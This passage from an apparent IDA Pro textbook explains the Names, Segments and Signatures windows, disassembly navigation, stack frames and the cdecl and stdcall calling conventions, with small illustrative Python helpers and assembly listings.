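    return [(m.start(1), m.group(1).decode("utf-16-le"))
            for m in pattern.finditer(data)]


def read_pascal16(data: bytes, offset: int = 0) -> str:
    """Read a string stored as a 2-byte little-endian length plus that many bytes."""
    (length,) = struct.unpack_from("<H", data, offset)
    raw = data[offset + 2: offset + 2 + length]
    if len(raw) != length:
        raise ValueError("declared length runs past the end of the buffer")
    return raw.decode("ascii")
```

A scanner that expects only C-style strings would see "H", "e", "l", and so on as separate one-character runs in UTF-16 data, and would find no terminator at all after a Pascal-style string, so both would go unreported.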

The Names Window

The Names window, shown in Figure 5-9, provides a summary listing of all

of the global names within a binary. A name is nothing more than a symbolic

description given to a program virtual address. IDA initially derives the list of

names from symbol-table and signature analysis during the initial loading of

a file. Names can be sorted alphabetically or in virtual address order (either

ascending or descending). The Names window is useful for rapidly navigating

to known locations within a program listing. Double-clicking any Names

window entry will immediately jump the disassembly view to display the

selected name.

Figure 5-9: The Names window


Displayed names are both color and letter coded. The coding scheme is summarized below:

F    A regular function. These are functions that IDA does not recognize as library functions.

L    A library function. IDA recognizes library functions through the use of signature-matching algorithms. If a signature does not exist for a given library function, the function will be labeled as a regular function instead.

I    An imported name, most commonly a function name imported from a shared library. The difference between this and a library function is that no code is present for an imported name, while the body of a library function will be present in the disassembly.

C    Named code. These are named program instruction locations that IDA does not consider to be part of any function. This is possible when IDA finds a name in a program’s symbol table but never sees a call to the corresponding program location.

D    Data. Named data locations typically represent global variables.

A    String data. This is a referenced data location containing a sequence of characters that conform to one of IDA’s known string data types, such as a null-terminated ASCII C string.

As you browse through disassemblies, you will notice that there are many named locations for which no name is listed in the Names window. In the process of disassembling a program, IDA generates names for all locations that are referenced directly either as code (a branch or call target) or as data (read, written, or address taken). If a location is named in the program’s symbol table, IDA adopts the name from the symbol table. If no symbol table entry is available for a given program location, IDA generates a default name for use in the disassembly. When IDA chooses to name a location, the virtual address of the location is combined with a prefix that indicates what type of location is being named. Incorporating the virtual address into a generated name ensures that all generated names will be unique, as no two locations can share the same virtual address. Autogenerated names of this type are not displayed in the Names window. Some of the more common prefixes used for autogenerated names include these:

sub_xxxxxx      A subroutine at address xxxxxx
loc_xxxxxx      An instruction location at address xxxxxx
byte_xxxxxx     8-bit data at location xxxxxx
word_xxxxxx     16-bit data at location xxxxxx
dword_xxxxxx    32-bit data at location xxxxxx
unk_xxxxxx      Data of unknown size at location xxxxxx


Throughout the course of the book we will show additional algorithms

that IDA applies in choosing names for program data locations.
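The prefix-plus-address scheme described above is simple enough to sketch in Python. The helper names auto_name and is_auto_name and the keys of the AUTO_PREFIXES table are hypothetical; only the prefixes themselves and the uppercase hexadecimal address suffix come from the names shown in this chapter.

```python
import re

# Prefixes listed in the text, keyed by an illustrative "kind" label.
AUTO_PREFIXES = {
    "function": "sub",
    "code": "loc",
    "byte": "byte",
    "word": "word",
    "dword": "dword",
    "unknown": "unk",
}

_AUTO_NAME_RE = re.compile(
    r"(?:%s)_[0-9A-F]+" % "|".join(sorted(set(AUTO_PREFIXES.values())))
)


def auto_name(kind: str, address: int) -> str:
    """Combine a type prefix with the virtual address, e.g. sub_4012E4."""
    return f"{AUTO_PREFIXES[kind]}_{address:X}"


def is_auto_name(name: str) -> bool:
    """Report whether a name follows the prefix_address pattern."""
    return _AUTO_NAME_RE.fullmatch(name) is not None
```

Because the address is part of the name, two distinct locations can never produce the same generated name. A filter like is_auto_name is one plausible way to separate such names from symbol-table names such as _main.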

The Segments Window

The Segments window displays a summary listing of the segments present in

the binary file. Note that what IDA terms segments are most often called sections

when discussing the structure of binary files. Do not confuse the use of the

term segments in this manner with the memory segments associated with CPUs

that implement a segmented memory architecture. Information presented

in the window includes the segment name, start and end addresses, and

permission flags. The start and end addresses represent the virtual address

range to which the program sections will be mapped at runtime. The following

listing is an example of Segments window content from a Windows binary:

Name Start End R W X D L Align Base Type Class AD es ss ds fs gs

UPX0 00401000 00407000 R W X . L para 0001 public CODE 32 0000 0000 0001 FFFFFFFF FFFFFFFF

UPX1 00407000 00408000 R W X . L para 0002 public CODE 32 0000 0000 0001 FFFFFFFF FFFFFFFF

UPX2 00408000 0040803C R W . . L para 0003 public DATA 32 0000 0000 0001 FFFFFFFF FFFFFFFF

.idata 0040803C 00408050 R W . . L para 0003 public XTRN 32 0000 0000 0001 FFFFFFFF FFFFFFFF

UPX2 00408050 00409000 R W . . L para 0003 public DATA 32 0000 0000 0001 FFFFFFFF FFFFFFFF

In this case, we might quickly suspect that something is funny with this

particular binary since it uses nonstandard segment names and has two exe-

cutable segments that are writable, thus indicating the possibility of self-

modifying code (more on this in Chapter 21). The fact that IDA knows the

size of a segment does not indicate that IDA knows the contents of the seg-

ment. For a variety of reasons, segments often occupy less space on disk than

they do in memory. In such cases, IDA displays values for the portions of the

segment that IDA has determined it could fill from the disk file. For the

remainder of the segment, IDA displays question marks.
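The "writable and executable" observation can be automated over rows in the format of the listing above. The following Python sketch is only an illustration: the Segment type and both function names are hypothetical, and the parser assumes the whitespace-separated column order shown in the listing (Name, Start, End, R, W, X, and so on).

```python
from typing import List, NamedTuple


class Segment(NamedTuple):
    name: str
    start: int
    end: int
    perms: str  # e.g. "RWX" or "RW"


def parse_segment_row(row: str) -> Segment:
    """Parse one Segments-window row; a '.' means the permission is absent."""
    fields = row.split()
    perms = "".join(flag for flag in fields[3:6] if flag != ".")
    return Segment(fields[0], int(fields[1], 16), int(fields[2], 16), perms)


def writable_and_executable(segments: List[Segment]) -> List[str]:
    """Return names of segments that are both writable and executable."""
    return [s.name for s in segments if "W" in s.perms and "X" in s.perms]
```

Applied to the five rows shown above, this flags UPX0 and UPX1, the two segments that prompted the suspicion of self-modifying code.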

Double-clicking any entry in the window jumps the disassembly view to

the start of the selected segment. Right-clicking an entry provides a context

menu from which you can add new segments, delete existing segments, or

edit the properties of existing segments. These features are particularly useful

when reverse engineering files with nonstandard formats, as the binary’s

segment structure may not have been detected by the IDA loader.

Command-line counterparts to the Segments window include objdump (-h),

readelf (-S), and dumpbin (/HEADERS).

The Signatures Window

IDA makes use of an extensive library of signatures for identifying known

blocks of code. Signatures are used to identify common compiler-generated

startup sequences in an attempt to determine the compiler that may have

been used to build a given binary. Signatures are also used to categorize

functions as known library functions inserted by a compiler or as functions

added to the binary as a result of static linking. When IDA identifies library


functions for you, you can focus more of your effort on the code that IDA did

not recognize (which is probably far more interesting to you than reverse

engineering the inner workings of printf).

The Signatures window is used to list the signatures that IDA has already

matched against the open binary file. An example from a Windows PE file is

shown here:

File State #func Library name

vc32rtf Applied 501 Microsoft VisualC 2-8/net runtime

This example indicates that IDA has applied the vc32rtf signatures

(from <IDADIR>/sigs) against the binary and, in doing so, has been able to

recognize 501 functions as library functions. That’s 501 functions that you

will not need to reverse engineer!

In at least two cases, you will want to know how to apply additional sig-

natures against your binaries. In the first case, IDA may fail to recognize the

compiler that was used to build a binary, with a resulting inability to select

appropriate signatures to apply. In this case, you may wish to force IDA to

apply one or more signatures that your preliminary analysis has led you to

believe IDA should try. The second situation involves creating your own sig-

natures for libraries that may not have existing signatures included with IDA.

An example might be the creation of signatures for the static version of the

OpenSSL libraries that ship with FreeBSD 8.0. DataRescue makes a toolkit

available for generating custom signatures that can be used by IDA’s signa-

ture-matching engine. We’ll cover the generation of custom signatures in

Chapter 12. Regardless of why you want to apply new signatures, either press-

ing the INSERT key or right-clicking the Signatures window will offer you the

Apply new signature option, at which time you can choose from a list of all

signatures known to your installation of IDA.

The Type Libraries Window

Similar in concept to the Signatures window is the Type Libraries window. Type

libraries represent IDA’s accumulated knowledge of predefined datatypes

and function prototypes gleaned from header files included with most pop-

ular compilers. By processing header files, IDA understands the datatypes

that are expected by common library functions and can annotate your disas-

semblies accordingly. Similarly, from these header files IDA understands

both the size and layout of complex data structures. All of this type informa-

tion is collected into TIL files (<IDADIR>/til) and applied any time a binary

is analyzed. As with signatures, IDA must first be able to deduce the libraries

that a program uses before it can select an appropriate set of TIL files to

load. You can request that IDA load additional type libraries by pressing the

INSERT key or by right-clicking within the Type Libraries window and choosing

Load type library. Type libraries are covered in more detail in Chapter 13.


The Function Calls Window

In any program, a function can both call and be called by other functions. In

fact, it is a fairly simple task to construct a graph that displays the relation-

ships between callers and callees. Such a graph is called a function call graph

or function call tree (we will demonstrate how to have IDA generate such graphs

in Chapter 9). On occasion, we may not be interested in seeing the entire

call graph of a program; instead, we may be interested only in knowing the

immediate neighbors of a given function. For our purposes, we will call Y a

neighbor of X if Y directly calls X or X directly calls Y.

The Function Calls window provides the answer to this neighbor question.

When you open the Function Calls window, IDA determines the neighbors of

the function in which the cursor is positioned and generates a display such as

that shown in Figure 5-10.

Figure 5-10: The Function Calls window

In this example, we see that the function named sub_40182C is called from

six different locations in _main and _main in turn makes 15 other function

calls. Double-clicking any line within the Function Calls window immediately

jumps the disassembly window to the selected calling or called function (or

caller and callee). IDA cross-references (xrefs) are the mechanisms that

underlie the generation of the Function Calls windows. Xrefs will be covered

in more detail in Chapter 9.
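The neighbor relationship defined in this section can be sketched over a list of (caller, callee) pairs, which is roughly the information that call cross-references provide. The function name neighbors and the sample edges in the usage note are hypothetical; this is not how IDA stores or queries xrefs.

```python
from typing import Iterable, List, Tuple


def neighbors(calls: Iterable[Tuple[str, str]],
              func: str) -> Tuple[List[str], List[str]]:
    """Return (callers, callees) of func given (caller, callee) pairs."""
    pairs = list(calls)
    callers = sorted({src for src, dst in pairs if dst == func})
    callees = sorted({dst for src, dst in pairs if src == func})
    return callers, callees
```

For example, with the pairs [("start", "_main"), ("_main", "sub_40182C"), ("_main", "_printf")], the neighbors of _main are the caller start and the callees _printf and sub_40182C. Repeated calls from different locations collapse to a single neighbor here, whereas the Function Calls window lists each call site separately.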

The Problems Window

The Problems window is IDA’s way of informing you of any difficulties that it

has encountered in disassembling a binary and how it has chosen to deal

with those difficulties. In some instances, you may be able to manipulate the

disassembly to help IDA overcome a problem, and in other instances you

may not. You can expect to encounter problems in even the simplest of


binaries. In many cases, simply choosing to ignore the problems is not a bad

strategy. In order to correct many of the problems, you need to have a better

understanding of the binary than IDA has, which for most of us is probably

not going to happen. A sample set of problems follows:

Address Type Instruction

.text:0040104C BOUNDS call eax

.text:004010B0 BOUNDS call eax

.text:00401108 BOUNDS call eax

.text:00401350 BOUNDS call dword ptr [eax]

.text:004012A0 DECISION push ebp

.text:004012D0 DECISION push ebp

.text:00401560 DECISION jmp ds:__set_app_type

.text:004015F8 DECISION dd 0FFFFFFFFh

.text:004015FC DECISION dd 0

Each problem is characterized by (1) the address at which the problem

occurs, (2) the type of problem encountered, and (3) the instruction present

at the problem location. In this example, we see a BOUNDS problem and a

DECISION problem. A BOUNDS problem occurs when the destination of a call

or jump either can’t be determined (as in this example, since the value of eax

is unknown to IDA) or appears to lie outside the range of virtual addresses in

a program. A DECISION problem is most often not a problem at all. A DECISION

usually represents an address at which IDA has chosen to disassemble bytes

as instructions rather than data even though the address has never been

referenced during the recursive descent instruction traversal (see Chapter 1).

A complete list of problem types and suggestions for how to deal with them is

available in the built-in IDA help file (see topic Problems List).

Summary

At first glance, the number of displays that IDA offers can seem overwhelm-

ing. You may find it easiest to stick with the primary displays until you are

comfortable enough to begin exploring the additional display offerings. In

any case, you should certainly not feel obligated to use everything that IDA

throws at you. Not every window will be useful in every reverse engineering

scenario.

In addition to the windows covered in this chapter, you will be confronted

by a tremendous number of dialogs as you endeavor to master IDA. We will

introduce key dialogs as they become relevant in the remainder of the book.

Finally, other than the default disassembly view graph, we have elected not to

cover graphs in this chapter. The IDA menu system distinguishes graphs as a

separate category of display from the subviews discussed in this chapter. We

will cover the reasons behind this in Chapter 9, which deals exclusively with

graphs.

At this point, you should be starting to get comfortable with the IDA user

interface. In the next chapter, we begin to focus on the many ways that you

can manipulate a disassembly to enhance your understanding of its behavior

and to generally make your life easier with IDA.


DISASSEMBLY NAVIGATION

In this and the following chapter we cover

the heart of what puts the Interactive in

IDA Pro, which is, in a nutshell, ease of navi-

gation and ease of manipulation. The focus of

this chapter is navigation; specifically, we show how IDA

facilitates moving around a disassembly in a logical

manner. So far, we have shown that at a basic level IDA simply combines

the features of many common reverse engineering tools into an integrated

disassembly display. Navigating around the display is one of the essential

skills required in order to master IDA. Static disassembly listings offer no

inherent navigational capability other than scrolling up and down the listing.

Even with the best text editors, such dead listings are very difficult to navigate,

as the best they have to offer is generally nothing more than an integrated,

grep-style search. As you shall see, IDA’s database underpinnings provide for

exceptional navigational features.


Basic IDA Navigation

In your initial experience with IDA, you may be happy to make use of nothing

more than the navigational features that IDA has to offer. In addition to

offering fairly standard search features that you are accustomed to from your

use of text editors or word processors, IDA develops and displays a comprehen-

sive list of cross-references that behave in a manner similar to hyperlinks on

a web page. The end result is that, in most cases, navigating to locations of

interest requires nothing more than a double-click.

Double-Click Navigation

When a program is disassembled, every location in the program is assigned

a virtual address. As a result, we can navigate anywhere within a program by

providing the virtual address of the location we are interested in visiting.

Unfortunately for us, maintaining a catalog of addresses in our head is not a

trivial task. This fact motivated early programmers to assign symbolic names

to program locations that they wished to reference, making things a whole

lot easier on themselves. The assignment of symbolic names to program

addresses was not unlike the assignment of mnemonic instruction names to

program opcodes; programs became easier to read and write by making them

easier to remember.

As we discussed previously, IDA generates symbolic names during the

analysis phase by examining a binary’s symbol table or by automatically gen-

erating a name based on how a location is referenced within the binary. In

addition to its symbolic purpose, any name displayed in the disassembly

window is a potential navigation target similar to a hyperlink on a web page.

The two differences between these names and standard hyperlinks are (1)

that the names are never highlighted in any way to indicate that they can be

followed and (2) that IDA requires a double-click to follow rather than the sin-

gle-click required by a hyperlink. We have already seen the use of names in

various subwindows such as the Functions, Imports, and Exports windows.

Recall that for each of these windows, double-clicking a name caused the dis-

assembly view to jump to the referenced location. This is one example of the

double-click navigation at work. In the following listing, each of the symbols labeled ➊ represents a named navigational target. Double-clicking any of them will cause IDA to relocate the display to the selected location.

.text:0040132B loc_40132B:                 ; CODE XREF: ➋sub_4012E4+B↑j
.text:0040132B                 cmp     edx, 0CDh
.text:00401331                 jg      short ➊loc_40134E
.text:00401333                 jz      ➊loc_4013BF
.text:00401339                 sub     edx, 0Ah
.text:0040133C                 jz      short ➊loc_4013A7
.text:0040133E                 sub     edx, 0C1h
.text:00401344                 jz      short ➊loc_4013AF
.text:00401346                 dec     edx
.text:00401347                 jz      short ➊loc_4013B7
.text:00401349                 jmp     ➊loc_4013DD     ; default
.text:00401349                                         ; jumptable 00401300 case 0
.text:0040134E ; ----------------------------------------------------------
.text:0040134E
.text:0040134E loc_40134E:                 ; CODE XREF: ➋sub_4012E4+4D↑j

For navigational purposes, IDA treats two additional display entities as navigational targets. First, cross-references (shown at ➋ here) are treated as navigational targets. Cross-references are generally formatted as a name and a hex offset. The cross-reference at the right of loc_40134E in the previous listing refers to a location that is 0x4D (decimal 77) bytes beyond the start of sub_4012E4. Double-clicking the cross-reference text will jump the display to the referencing location (00401331 in this case). Cross-references are covered in more

detail in Chapter 9.
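The name-plus-offset arithmetic behind a cross-reference is easy to check by hand or with a few lines of Python. This is only a sketch: resolve_xref and the symbols dictionary are hypothetical helpers, and the sketch assumes the offset after the plus sign is hexadecimal, as in the listing above.

```python
from typing import Dict


def resolve_xref(xref: str, symbols: Dict[str, int]) -> int:
    """Turn 'name+hexoffset' (or a bare 'name') into a virtual address."""
    name, _, offset = xref.partition("+")
    return symbols[name] + (int(offset, 16) if offset else 0)
```

With sub_4012E4 located at 0x4012E4, the text sub_4012E4+4D resolves to 0x401331, which is the address of the jg instruction that refers to loc_40134E.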

The second type of display entity afforded special treatment in a naviga-

tional sense is one that uses hexadecimal values. If a displayed hexadecimal

value represents a valid virtual address within the binary, then double-clicking

the value will reposition the disassembly window to display the selected virtual

address. In the listing that follows, double-clicking any of the values indicated by ➌ will jump the display, because each is a valid virtual address within the given binary, while double-clicking any of the values indicated by ➍ will have no effect.

.data:00409013                 db ➍4
.data:00409014                 dd ➌4037B0h
.data:00409018                 db ➍0
.data:00409019                 db ➍0Ah
.data:0040901A                 dd ➌404590h
.data:0040901E                 db ➍0
.data:0040901F                 db ➍0Ah
.data:00409020                 dd ➌404DA8h
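The rule for hexadecimal values amounts to a range check against the addresses occupied by the binary. The Python sketch below applies that check to the operands in the listing above. The address range in the usage note is an assumption, since the segment layout of this binary is not shown, and the names parse_operand and is_navigable are hypothetical.

```python
from typing import Iterable, Tuple


def parse_operand(text: str) -> int:
    """Parse an operand as displayed: a trailing 'h' marks hexadecimal."""
    text = text.strip()
    if text.lower().endswith("h"):
        return int(text[:-1], 16)
    return int(text, 10)


def is_navigable(value: int, ranges: Iterable[Tuple[int, int]]) -> bool:
    """True if value falls inside any [start, end) virtual address range."""
    return any(start <= value < end for start, end in ranges)
```

Assuming the binary occupies 0x401000 through 0x40A000, the values 4037B0h, 404590h, and 404DA8h pass the check, while 4, 0, and 0Ah do not, matching the behavior described for the listing.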

A final note about double-click navigation concerns the IDA Output

window, which is most often used to display informational messages. When

a navigational target, as previously described, appears as the first item in a

message, double-clicking the message will jump the display to the indicated

target.

Propagating type information...

Function argument information has been propagated

The initial autoanalysis has been finished.

➎ 40134e is an interesting location

➏ Testing: 40134e

➎ loc_4013B7

➏ Testing: loc_4013B7

In the Output window excerpt just shown, the two messages indicated by ➎ can be used to navigate to the addresses indicated at the start of the respective messages. Double-clicking any of the other messages, including those at ➏, will result in no action at all.
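The "first item in the message" rule can be expressed as a small Python function. This is a sketch of the behavior described above, not of IDA's code: message_target, the names dictionary, and the lo and hi bounds are all hypothetical, and the bounds stand in for whatever IDA uses to decide that an address is valid.

```python
import re
from typing import Dict, Optional

_HEX_RE = re.compile(r"[0-9A-Fa-f]+")


def message_target(message: str, names: Dict[str, int],
                   lo: int, hi: int) -> Optional[int]:
    """Return the address named by the first token of a message, if any."""
    tokens = message.split(None, 1)
    if not tokens:
        return None
    first = tokens[0]
    if first in names:
        return names[first]
    if _HEX_RE.fullmatch(first):
        address = int(first, 16)
        if lo <= address < hi:  # only valid addresses are targets
            return address
    return None
```

Only the leading token is examined, so a message such as "Testing: 40134e" yields no target even though it contains a valid address later in the line.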


Jump to Address

Occasionally, you will know exactly what address you would like to navigate to,

yet no name will be handy in the disassembly window to offer simple double-

click navigation. In such a case, you have a few options. The first, and most

primitive, option is to use the disassembly window scroll bar to scroll the

display up or down until the desired location comes into view. This is usually

feasible only when the location you are navigating to is known by its virtual

address, since the disassembly window is organized linearly by virtual address.

If all you know is a named location such as a subroutine named foobar, then

navigating via the scroll bar becomes something of a needle-in-a-haystack

search. At that point, you might choose to sort the Functions window alpha-

betically, scroll to the desired name, and double-click the name. A third option

is to use one of IDA’s search features available via the Search menu, which typ-

ically involves specifying some search criteria before asking IDA to perform a

search. In the case of searching for a known location, this is usually overkill.

Ultimately, the easiest way to get to a known disassembly location is to

make use of the Jump to Address dialog shown in Figure 6-1.

Figure 6-1: The Jump to Address dialog

The Jump to Address dialog is accessed via Jump ▸ Jump to Address, or

by using the G hotkey while the disassembly window is active. Thinking of

this dialog as the Go dialog may help you remember the associated hotkey.

Navigating to any location in the binary is as simple as specifying the address

(a name or hex value will do) and clicking OK, which will immediately jump

the display to the desired location. Values entered into the dialog are remem-

bered and made available on subsequent use via a drop-down list. This history

feature makes returning to previously requested locations somewhat easier.

Navigation History

If we compare IDA’s document-navigation functions to those of a web browser,

we might equate names and addresses to hyperlinks, as each can be followed

relatively easily to view a new location. Another feature IDA shares with tradi-

tional web browsers is the concept of forward and backward navigation based

on the order in which you navigate the disassembly. Each time you navigate

to a new location within a disassembly, your current location is appended to

a history list. Two menu operations are available for traversing this list. First,

JumpJump to Previous Position repositions the disassembly to the most

recent entry in the history list. The behavior is conceptually identical to a

web browser’s back button. The associated hotkey is ESC, and it is one of the

most useful hotkeys that you can commit to memory. Be forewarned, how-

ever, that using ESC when any window other than the disassembly window is


active causes the active window to be closed. (You can always reopen windows

that you closed accidentally via View ▸ Open Subviews.) Backward navigation

is extremely handy when you have followed a chain of function calls several

levels deep and you decide that you want to navigate back to your original

position within the disassembly.

JumpJump to Next Position is the counterpart operation that moves

the disassembly window forward in the history list in a manner similar to a

web browser’s forward button. For the sake of completeness, the associated

hotkey for this operation is CTRL-ENTER, though it tends to be less useful than

using ESC for backward navigation.
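The browser analogy suggests a simple two-list model of the navigation history, sketched here in Python. The class and method names are hypothetical, and one detail is an assumption borrowed from web browsers rather than from the text: jumping to a new location discards any pending forward entries.

```python
from typing import List


class NavigationHistory:
    """Browser-style back/forward history of visited addresses."""

    def __init__(self, start: int) -> None:
        self.current = start
        self._back: List[int] = []
        self._forward: List[int] = []

    def jump(self, address: int) -> None:
        """Navigate to a new location, remembering where we came from."""
        self._back.append(self.current)
        self._forward.clear()  # assumption: new jumps drop forward entries
        self.current = address

    def back(self) -> int:
        """Counterpart of Jump to Previous Position (ESC)."""
        if self._back:
            self._forward.append(self.current)
            self.current = self._back.pop()
        return self.current

    def forward(self) -> int:
        """Counterpart of Jump to Next Position (CTRL-ENTER)."""
        if self._forward:
            self._back.append(self.current)
            self.current = self._forward.pop()
        return self.current
```

After following a chain of calls with jump, repeated calls to back retrace the chain in reverse order, which is the situation in which ESC is most useful.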

Finally, two of the more useful toolbar buttons, shown in Figure 6-2, provide the familiar browser-style forward and backward behavior. Each of the buttons is associated with a drop-down history list that offers you instant access to any location in the navigation history without having to trace your steps through the entire list.

Figure 6-2: Forward and backward navigation buttons

Stack Frames

Because IDA Pro is such a low-level analysis tool, many of its features and displays expect the user to be somewhat familiar with the low-level details of compiled languages, many of which center on the specifics of generating machine language and managing the memory used by a high-level program. Therefore, from time to time this book covers some of the theory of compiled programs in order to make sense of the related IDA displays.

One such low-level concept is that of the stack frame. Stack frames are blocks of memory allocated within a program’s runtime stack and dedicated to a specific invocation of a function. Programmers typically group executable statements into units called functions (also called procedures, subroutines, or methods). In some cases this may be a requirement of the language being used. In most cases it is considered good programming practice to build programs from such functional units.

When a function is not executing, it typically requires little to no memory. When a function is called, however, it may require memory for several reasons. First, the caller of a function may wish to pass information into the function in the form of parameters (arguments), and these parameters need to be stored somewhere the function can find them. Second, the function may need temporary storage space while performing its task. This temporary space is often allocated by a programmer through the declaration of local variables, which can be used within the function but cannot be accessed once the function has completed.

Compilers utilize stack frames (also called activation records) to make the allocation and deallocation of function parameters and local variables transparent to the programmer. A compiler inserts code to place a function’s parameters into the stack frame prior to transferring control to the function itself, at which point the compiler inserts code to allocate enough memory to

hold the function’s local variables. As a consequence of the way stack frames

are constructed, the address to which the function should return is also

stored within the new stack frame. A pleasant result of the use of stack

frames is that recursion becomes possible, as each recursive call to a function

is given its own stack frame, neatly segregating each call from its predecessor.

The following steps detail the operations that take place when a function is

called:

1. The caller places any parameters required by the function being called

into locations as dictated by the calling convention (see “Calling Con-

ventions” on page 85) employed by the called function. This operation

may result in a change to the program stack pointer if parameters are

placed on the runtime stack.

2. The caller transfers control to the function being called. This is usually

performed with an instruction such as the x86 CALL or the MIPS JAL. A

return address is typically saved onto the program stack or in a CPU register.

3. If necessary, the called function takes steps to configure a frame pointer¹

and saves any register values that the caller expects to remain unchanged.

4. The called function allocates space for any local variables that it may

require. This is often done by adjusting the program stack pointer to

reserve space on the runtime stack.

5. The called function performs its operations, potentially generating a

result. In the course of performing its operations, the called function

may access the parameters passed to it by the calling function. If the func-

tion returns a result, the result is often placed into a specific register or

registers that the caller can examine once the function returns.

6. Once the function has completed its operations, any stack space reserved

for local variables is released. This is often done by reversing the actions

performed in step 4.

7. Any registers whose values were saved (in step 3) on behalf of the caller

are restored to their original values. This includes the restoration of the

caller’s frame pointer register.

8. The called function returns control to the caller. Typical instructions for

this include the x86 RET and the MIPS JR instructions. Depending on the

calling convention in use, this operation may also serve to clear one or

more parameters from the program stack.

9. Once the caller regains control, it may need to remove parameters from

the program stack. In such cases a stack adjustment may be required to

restore the program stack pointer to the value that it held prior to step 1.

1. A frame pointer is a register that points to a location inside a stack frame. Variables within the

stack frame are typically referenced by their relative distance from the location to which the frame

pointer points.

Steps 3 and 4 are so commonly performed upon entry to a function that

together they are called the function’s prologue. Similarly, steps 6 through 8

are so frequently performed at the end of a function that together they make

up the function’s epilogue. With the exception of step 5, which represents the

body of the function, all of these operations constitute the overhead associated

with calling a function.

Calling Conventions

With a basic understanding of what stack frames are, we can take a closer

look at exactly how they are structured. The examples that follow reference

the x86 architecture and the behavior associated with common x86 compilers

such as Microsoft Visual C/C++ or GNU’s gcc/g++. One of the most important

steps in the creation of a stack frame involves the placement of function

parameters onto the stack by the calling function. The calling function must

store parameters exactly as the function being called expects to find them;

otherwise, serious problems can arise. Functions advertise the manner in

which they expect to receive their arguments by selecting and adhering to a

specific calling convention.

A calling convention dictates exactly where a caller should place any

parameters that a function requires. Calling conventions may require parameters

to be placed in specific registers, on the program stack, or in both registers

and on the stack. Equally important, when parameters are passed on the program

stack, is determining who is responsible for removing them

from the stack once the called function has completed. Some calling con-

ventions dictate that the caller is responsible for removing parameters that it

placed on the stack, while other calling conventions dictate that the called

function will take care of removing the parameters from the stack. Adherence

to publicized calling conventions is essential in maintaining the integrity of

the program stack pointer.

The C Calling Convention

The default calling convention used by most C compilers for the x86 arch-

itecture is called the C calling convention. The _cdecl modifier may be used by

C/C++ programs to force compilers to utilize the C calling convention when

the default calling convention may have been overridden. We will refer to

this calling convention as the cdecl calling convention from here on. The

cdecl calling convention specifies that the caller place parameters to a function

on the stack in right-to-left order and that the caller (as opposed to the callee)

remove the parameters from the stack after the called function completes.

One result of placing parameters on the stack in right-to-left order is that

the leftmost (first) parameter of the function will always be on the top of the

stack when the function is called. This makes the first parameter easy to find

regardless of the number of parameters the function expects, and it makes

the cdecl calling convention ideally suited for use with functions that can take

a variable number of arguments (such as printf).

Requiring the calling function to remove parameters from the stack

means that you will often see instructions that make an adjustment to the

program stack pointer immediately following the return from a called func-

tion. In the case of functions that can accept a variable number of arguments,

the caller is ideally suited to make this adjustment, as the caller knows exactly

how many arguments it has chosen to pass to the function and can easily make

the correct adjustment, whereas the called function never knows ahead of

time how many parameters it may receive and would have a difficult time

making the necessary stack adjustment.
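
To make the variable-argument point concrete, here is a minimal C sketch. The function sum_ints is hypothetical and is not part of the original example. Its body has no way of knowing how many values were passed other than trusting its first parameter, which is why a convention that leaves stack cleanup to the caller fits such functions well.

```c
#include <stdarg.h>

/* Hypothetical variadic function: sums `count` int arguments.
 * Only the caller knows how many values it actually passed, so under
 * cdecl the caller is also the one that removes them from the stack. */
int sum_ints(int count, ...)
{
    va_list args;
    int total = 0;

    va_start(args, count);
    for (int i = 0; i < count; i++) {
        total += va_arg(args, int);   /* fetch the next int argument */
    }
    va_end(args);
    return total;
}
```

A call such as sum_ints(3, 1, 2, 3) passes four values in total, and a 32-bit cdecl caller would be expected to follow it with a 16-byte stack adjustment.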

In the following examples we consider calls to a function having the fol-

lowing prototype:

void demo_cdecl(int w, int x, int y, int z);

By default, this function will use the cdecl calling convention, expecting

the four parameters to be pushed in right-to-left order and requiring the

caller to clean the parameters off the stack. A compiler might generate code

for a call to this function as follows:

; demo_cdecl(1, 2, 3, 4);   // programmer calls demo_cdecl
➊ push 4                    ; push parameter z
  push 3                    ; push parameter y
  push 2                    ; push parameter x
  push 1                    ; push parameter w
  call demo_cdecl           ; call the function
➋ add esp, 16               ; adjust esp to its former value

The four push operations beginning at ➊ result in a net change to the

program stack pointer (ESP) of 16 bytes (4 * sizeof(int) on a 32-bit

architecture), which is undone at ➋ following the return from demo_cdecl. If

demo_cdecl is called 50 times, each call will be followed by an adjustment

similar to that at ➋. The following example also adheres to the cdecl calling

convention while eliminating the need for the caller to explicitly clean

parameters off the stack following each call to demo_cdecl.

; demo_cdecl(1, 2, 3, 4);   // programmer calls demo_cdecl
mov dword [esp+12], 4       ; move parameter z to fourth position on stack
mov dword [esp+8], 3        ; move parameter y to third position on stack
mov dword [esp+4], 2        ; move parameter x to second position on stack
mov dword [esp], 1          ; move parameter w to top of stack
call demo_cdecl             ; call the function

In this example, the compiler has preallocated storage space for the

parameters to demo_cdecl at the top of the stack during the function prologue.

When the parameters for demo_cdecl are placed on the stack, there is no change

to the program stack pointer, which eliminates the need to adjust the stack

pointer when the call to demo_cdecl completes. The GNU compilers (gcc and

g++) utilize this technique to place function parameters onto the stack.

Note that either method results in the stack pointer pointing to the leftmost

argument when the function is called.

The Standard Calling Convention

Standard in this case is a bit of a misnomer as it is a name that Microsoft created

for its own calling convention marked by the use of the _stdcall modifier in a

function declaration, as shown here:

void _stdcall demo_stdcall(int w, int x, int y);

In order to avoid any confusion surrounding the word standard, we will

refer to this calling convention as the stdcall calling convention for the

remainder of the book.

As with the cdecl calling convention, stdcall requires that function param-

eters be placed on the program stack in right-to-left order. The difference

when using stdcall is that the called function is responsible for clearing the

function parameters from the stack when the function has finished. In order

for a function to do this, the function must know exactly how many parameters

are on the stack. This is possible only for functions that accept a fixed number

of parameters. As a result, variable argument functions such as printf cannot

make use of the stdcall calling convention. The demo_stdcall function, for

example, expects three integer parameters, occupying a total of 12 bytes on

the stack (3 * sizeof(int) on a 32-bit architecture). An x86 compiler can use

a special form of the RET instruction to simultaneously pop the return address

from the top of the stack and add 12 to the stack pointer to clear the function

parameters. In the case of demo_stdcall, we might see the following instruction

used to return to the caller:

ret 12 ; return and clear 12 bytes from the stack

The primary advantage to the use of stdcall is the elimination of code to

clean parameters off the stack following every function call, which results in

slightly smaller, slightly faster programs. By convention Microsoft utilizes the

stdcall convention for all fixed-argument functions exported from shared

library (DLL) files. This is an important point to remember if you are attempt-

ing to generate function prototypes or binary-compatible replacements for

any shared library components.

The fastcall Convention for x86

A variation on the stdcall convention, the fastcall calling convention passes

up to two parameters in CPU registers rather than on the program stack. The

Microsoft Visual C/C++ and GNU gcc/g++ (version 3.4 and later) compilers

